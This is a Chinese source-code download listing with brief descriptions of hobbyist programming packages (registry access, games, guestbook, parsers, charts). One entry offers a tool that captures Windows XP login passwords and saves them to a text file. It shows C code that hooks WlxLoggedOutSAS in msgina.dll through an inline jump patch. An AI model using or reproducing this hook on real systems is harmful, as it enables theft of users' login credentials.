-
用Visual C++实现注册表简单操作。学会编程中使用注册表会使你的程序更专业。本例包含基本的编程方法。...
用Visual C++实现注册表简单操作。学会编程中使用注册表会使你的程序更专业。本例包含基本的编程方法。-achieve registry simple operation. Programming Institute will use the registry your program more professional. The cases include basic programming method.
- 2022-07-24 07:29:35下载
- 积分:1
-
研究说明模板,包含基本模板,使用实例,用户
模板学习笔记,包含基本模板使用实例,通俗易懂,适合初学者观看-Study Notes template that contains the basic template to use examples, user-friendly, suitable for beginners Views
- 2022-02-15 18:50:06下载
- 积分:1
-
JSP and SQL SERVER messages of this: by using sql server and a message of the js...
JSP与SQL SERVER的留言本:通过用sql server和jsp做一个留言本。-JSP and SQL SERVER messages of this: by using sql server and a message of the jsp.
- 2023-07-08 21:25:03下载
- 积分:1
-
一个vb编写的五子棋,数据库里保存了棋谱,能帮助你识别如何获取下一步的信息...
一个vb编写的五子棋,数据库里保存了棋谱,能帮助你识别如何获取下一步的信息-A vb Gobang prepared, preserved chess database that can help you identify how to obtain further information
- 2022-02-05 18:18:25下载
- 积分:1
-
音乐俱乐部系统
APU音乐俱乐部有一个很大的音乐从differentcountries的集合。becomesbigger集合,需要一个系统来管理现有的收集效率。的系统将被用来记录音乐收藏俱乐部的成员能够监控俱乐部musiccollection。有两个用户为系统;俱乐部成员,他们需要登录到系统,以添加、删除、编辑、搜索和查看collections,APU学生能从俱乐部搜索查看可用的音乐收藏
- 2022-08-05 19:54:19下载
- 积分:1
-
字符串查询程序,程序运行之后输入要查询的字符串,可以查到在文件中出现次数等...
字符串查询程序,程序运行之后输入要查询的字符串,可以查到在文件中出现次数等-String query program, the program is running after the Enter query string can be found such occurrences in the document
- 2022-02-05 09:27:20下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
MFC实现的多线程编程,只是作为练习看看的,高手就不要下载了...
MFC实现的多线程编程,只是作为练习看看的,高手就不要下载了-MFC to achieve multi-threaded programming only as a practice to see, the master, do not download
- 2022-02-04 01:52:39下载
- 积分:1
-
c# VSchart实时曲线Demo源码
c# VSchart实时曲线Demo源码,可以帮助你快速编写基于VSchart的实时曲线程序。
- 2022-02-22 06:21:51下载
- 积分:1
-
对输入的数学算式进行分析计算
用户可以添加自己定义的函数分析函数。
对输入的数学算式进行分析计算
用户可以添加自己定义的函数分析函数。-To enter the mathematical formula for calculation the user can add their own analysis of the definition of the function function.
- 2022-05-22 09:09:55下载
- 积分:1